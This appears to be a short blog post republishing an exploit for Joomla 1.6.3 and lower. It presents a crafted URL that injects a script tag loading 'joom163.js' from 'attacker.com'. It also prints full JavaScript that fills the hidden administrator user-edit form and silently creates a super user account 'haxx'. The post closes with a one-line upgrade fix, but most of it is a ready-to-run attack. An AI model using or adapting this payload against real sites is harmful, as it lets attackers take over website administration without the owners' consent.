CSRF Exploit for Joomla 1.6.3 or Lower

New exploit has been published that are targeting Joomla 1.6.3 or lower version the vulnerability  allow an attacker to create a specially crafted URL that would execute arbitrary script code on  victim’s browser.

Cross-site request (XSRF or CSRF) is a web application attack that uses the existing trust relationship between web applications and authenticated users to force those users to commit arbitrary sensitive transactions on the behalf of an attacker.

Here attacking scenario can be as follows the attacker will create a malicious HTML page on a system under his control that may contain a java script joom163.js:

http://vulnerablewebsite.com/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1″;’>”><script src=http://attacker.com/joom163.js></script>

The JavaScript contains the following code:

[php]document.writeln(‘<iframe id="iframe" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"></iframe>’);

function read()
{
var name="Test";
var username="haxx";
var password="test123";
var email="fake _at_ gmail.com";

document.getElementById("iframe").contentDocument.forms[0].jform_name.value = name;
document.getElementById("iframe").contentDocument.forms[0].jform_username.value = username;
document.getElementById("iframe").contentDocument.forms[0].jform_password.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_password2.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_email.value = email;
document.getElementById("iframe").contentDocument.forms[0].getElementById("1group_8").checked=true;
document.getElementById("iframe").contentDocument.getElementsByTagName("a")[11].onclick();
}[/php]

By visiting the vulnerable page the authenticated user will execute without knowing a JavaScript to create on the background HTTP GET request that will create a super user account (username=”haxx”, password=”test123″) action and ofcourse any associated cookies with that domain, port, and path will automatically be attached to the HTTP header and sent along with the request.

To fix the vulnerability you need upgrade to Joomla! 1.6.4 or higher.

Share
You can leave a response, or trackback from your own site.